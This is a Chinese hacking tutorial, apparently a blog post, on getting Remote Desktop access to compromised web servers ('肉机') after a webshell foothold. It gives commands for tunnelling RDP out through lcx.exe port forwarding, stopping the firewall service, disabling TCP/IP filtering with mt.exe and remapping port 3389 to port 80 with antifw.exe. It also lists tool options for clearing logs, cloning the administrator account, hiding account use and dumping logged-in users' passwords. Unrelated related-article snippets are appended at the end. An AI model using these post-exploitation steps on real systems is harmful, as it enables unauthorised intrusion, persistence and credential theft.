开了3389后WEB渗透远程连接不上的分析与解决

  对于开了3389,连接不上,有几个方面的原因,我来总结下,哇咔咔,这几天提好几台服务器都TM这样,分析下,

  原因1、远程桌面端口被更改。2、对方服务器处于内网。3、防火墙拦截。4、TCP/IP安全限制。

  好了,知道原因了,我们来一个一个思考解决方法(部分引用):

  远程桌面端口被更改解决方法:

  现在一般的asp大马都有探测服务器的功能,在权限还行的情况下都可以直接查看远程(TerminalService)端口,或者可以查看注册表也可以得到远程桌面端口,asp权限不行,在支持aspx的时候就换aspx查看注册表。

  对方服务器处于内网解决方法:

  这种情况我们可以使用lcx做端口转发,不知道的或者没有的就百度“lcx。exe下载”,我就不提供下载了。

  使用方法:

  1。上传lcx。exe到目标服务器可执行目录

  2。本地主机启动lcx。exe监听,命令:

  lcx。exe-listen19884567//监听1988端口并转发到4567端口

  在目标主机运行:

  格式为:

  lcx。exe-slave你的IP你监听的端口肉机IP要转发的目标主机端口

  例子:lcx。exe-slave192。168。86。11988192。168。86。33389

  3。本地链接:127。0。0。1:1988

  OK,有点小麻烦,不过还是很管用的,要是你也是内网,你就做下端口映射就好了,映射到转发回来的端口,哇咔咔。

  4、防火墙拦截解决办法:

  一般还是先试试端口转发,还是利用LCX,

  使用方法:

  lcx。exe-slave你的IP你监听的端口肉机要转发的目标主机端口

  例子:lcx。exe-slave192。168。86。11988192。168。86。33389

  然后本地连接:127。0。0。1:1988就搞定了。

  如果还不行。。要是web是SYSTEM权限,直接停掉防火墙服务就没问题了。

  5、TCP/IP安全策略限制。

  这个解决方法就有点多了,可以使用MT。EXE来关闭策略,

  使用方法:

  1。上传mt。exe到目标服务器可执行目录

  2。执行命令:mt。exe-filteroff

  这样就关闭了TCP/IP限制了

  选项:

  -filter—更改TCP/IP过滤器的开头状态

  -addport—添加端口到过滤器的允许列表

  -setport—设置端口作为过滤器的允许列表

  -nicinfo—列出TCP/IP界面信息

  -pslist—列出活动进程

  -pskill—杀毒指定进程

  -dlllist—列出指定进程的DLL

  -sysinfo—列出系统信息

  -shutdown—关闭系统

  -reboot—重启系统

  -poweroff—关闭电源

  -logoff—注销当前用户会话

  -chkts—检查终端服务信息

  -setupts—安装终端服务

  -remts—卸载终端服务

  -chgtsp—重置终端服务端口

  -clog—清除系统日志

  -enumsrv—列出所有服务

  -querysrv—列出指定服务的详细信息

  -instsrv—安装一个服务

  -cfgsrv—更改服务配置

  -remsrv—卸载指定服务

  -startsrv—启动指定服务

  -stopsrv—停止指定服务

  -netget—从http/ftp下载

  -redirect—端口重定向

  -chkuser—列出所有账户、sid和anti克隆

  -clone—克隆admin到目标

  -never—设置账户看上去从未登录

  -killuser—删除账户,甚至是“guest”也可删除

  -su—以Local_System权限运行进程

  -findpass—显示所有已登录用户的口令

  -netstat—列出TCP连接

  -killtcp—杀死TCP连接

  -psport—映射端口到进程

  -touch—设置文件日期和时间到指定值

  -secdel—安全擦除文件或目录占用的空间

  -regshell—进入一个控制台注册表编辑器

  -chkdll—检测ginadll后门

  上面只是一种方法,再说一种好用的方法吧,成功率灰常高,哇咔咔。

  使用antifw。exe这个工具,

  使用方法:

  在cmd下输入

  antifw-s运行程序停止iis将3389改为80

  antifw-l关闭程序。恢复iis

  连接的时候直接连接他的80端口就OK了,内网外网通杀!成功率比较高。但是这样他网站就访问不了。。。

  没事,上去了我们赶紧分析原因,排除万难,把限制去掉,再给他还原80端口,哇咔咔。。。

时间: 2024-08-03 11:37:56

开了3389后WEB渗透远程连接不上的分析与解决的相关文章

mysql数据库-远程连接服务器上,在自己的帐号下建立java连接mysql的程序,但是一直连接不上

问题描述 远程连接服务器上,在自己的帐号下建立java连接mysql的程序,但是一直连接不上 我是通过远程连接在实验室机房的一台机器(linux操作系统)上,然后在该机器上建立JAVA程序,其中涉及到连接mysql数据库的操作,但是在获取连接时一直提示"Communications link failure",涉及的代码为:connect=DriverManager.getConnection(""jdbc:mysql://localhost:3306/pyq_te

远程桌面无法连接的问题原因分析及解决

  有时候用户在进行远程桌面连接的时候,会发现远程桌面无法连接的问题,导致这种问题的原因有很多,下面我们就来逐一分析远程桌面无法连接的原因以及解决方法. 一.提示"本地计算机客户端访问许可不能升级或更新"的解决方法 1.打开被控机的注册表编辑器,定位到HKLMSOFTWAREMicrosoftMSLicensing. 2. 备份MSLicensing键. 3.删除MSLicensing键,重启系统. 二.中断远程桌面连接,客户端无法建立跟远程计算机的连接 导致这个错误的可能的原因是:

Linux上如何通过 OpenVPN 建立安全的远程连接【上】

一直以来,我们在互联网上传输信息时,都谨慎地为这些信息加密,以防内容泄露出去,特别是在政府的干预下,为网络上每个字节都进行加密已经变得空前重要了.在这种情况下,OpenVPN 是保障网络信息安全的首选.今天我们就来学习一下如何架设 OpenVPN,使你可以在任何场所都能安全地访问家里的服务器. VPN 小贴士:很多商业的 VPN 根本不值它们的售价,它们的安全性只比通过 SSL 保护的网站高一点点,原因是它们信任所有客户端.一个真正意义上的 VPN 用于在非可信网络上连接两个可信的终端.用户不能

sql 2005不允许进行远程连接可能会导致此失败的解决方法_mssql2005

(provider: 命名管道提供程序, error: 40 - 无法打开到 SQL Server 的连接) 网站的数据库连接语句为:Server=127.0.0.1;uid=sa;pwd=xxx;database=xxx 经测试把server=127.0.0.1改为"server=."或"server=机器名",都可以正常连接: 所以只有在用IP时不能连接,经分析,解决方法如下: 1.打开Sql Server 2005 "配置工具" 中的&qu

MySQL的远程连接出现错误提示分析

技巧问题 Mysql的远程连接出现"Lost connection to MySQL server during query" 安装完了RH 8.0用自带的mysql以后直接在本机上可以正常使用mysql登陆,用 mysql -u root -p 添加了一些用户,如* beginner pass 即beginner可以从任何地方通过密码可以访问这台Mysql服务器(假设我的mysql服务器为mysql.test.com)但当我运行 mysql -h mysql.test.com -u

香港服务器为什么远程连接不上

香港服务器正成为越来越多的企业用户的首选外贸服务器,但有时候香港服务器却不能进行远程连接或登录操作.香港服务器不能进行远程连接的原因有多个方面,解决的方式也不同,现在就让九河网络小编带大家了解一下. 一.本地网络不通 本地网络不通是用户首先要检查的.如果本地网络不能访问互联网,那么肯定无法远程连接香港服务器.本地网络的检查方法每个人都知道,这里就不多说了. 二.登录账号或密码错误 登录账号或密码错误是非常常见的无法登录香港服务器的原因,这种方式通常都有相应的错误提示.因为登录账号或者登录密码错误

MySQL远程连接不上的解决方法

之前遇到过MySQL本地可以连接但是远程连不上的问题,没有记录,今天在云上新申请的服务器上又遇到这个问题,记录一下解决过程. 1.排除网络或防火墙问题 先看是否能ping通远程服务器,ping 192.168.1.211,如果不可以就是网络问题.然后,检查端口是否被防火墙挡住了,telnet 192.168.1.211 3306,如果连接失败,配置防火墙.配置防火墙,开启3306端口 vi /etc/sysconfig/iptables -A INPUT -m state –state NEW

远程连接MySQL报错ERROR 2003解决办法

问题代码代码 ERROR 2003 (HY000): Can't connect to MySQL server on '192.168.0.19' (111) ERROR 2003 (HY000): Can't connect to MySQL server on '192.168.0.19' (111) 这个 原因就是Mysql数据库的默认配置文件my.cnf(linux下)中的bind-address默认为127.0.0.1,所以就算你创建了可以 remote访问的用户,你也不能使用mys

KB967723补丁造成的MYSQL在Win2003上频繁连接不上的问题的解决方法_服务器其它

有人可能会问,为什么9号出现的补丁,到现在才发现问题?大家都知道,服务器不是每天都重启的,有的服务器可能一个月或者一年半载重启一次,有的可能在9月9日以后重启过服务器,所以补丁生效了(我个人这么认为).症状: Can't connect to MySQL server on 'localhost' (10061) 解决方案: 老方法:卸载KB967723补丁:登录服务器,进入控制面板 - 添加和删除程序 - (勾选上方的"显示更新")在里面可以看到更新的KB967723这个补丁,然后就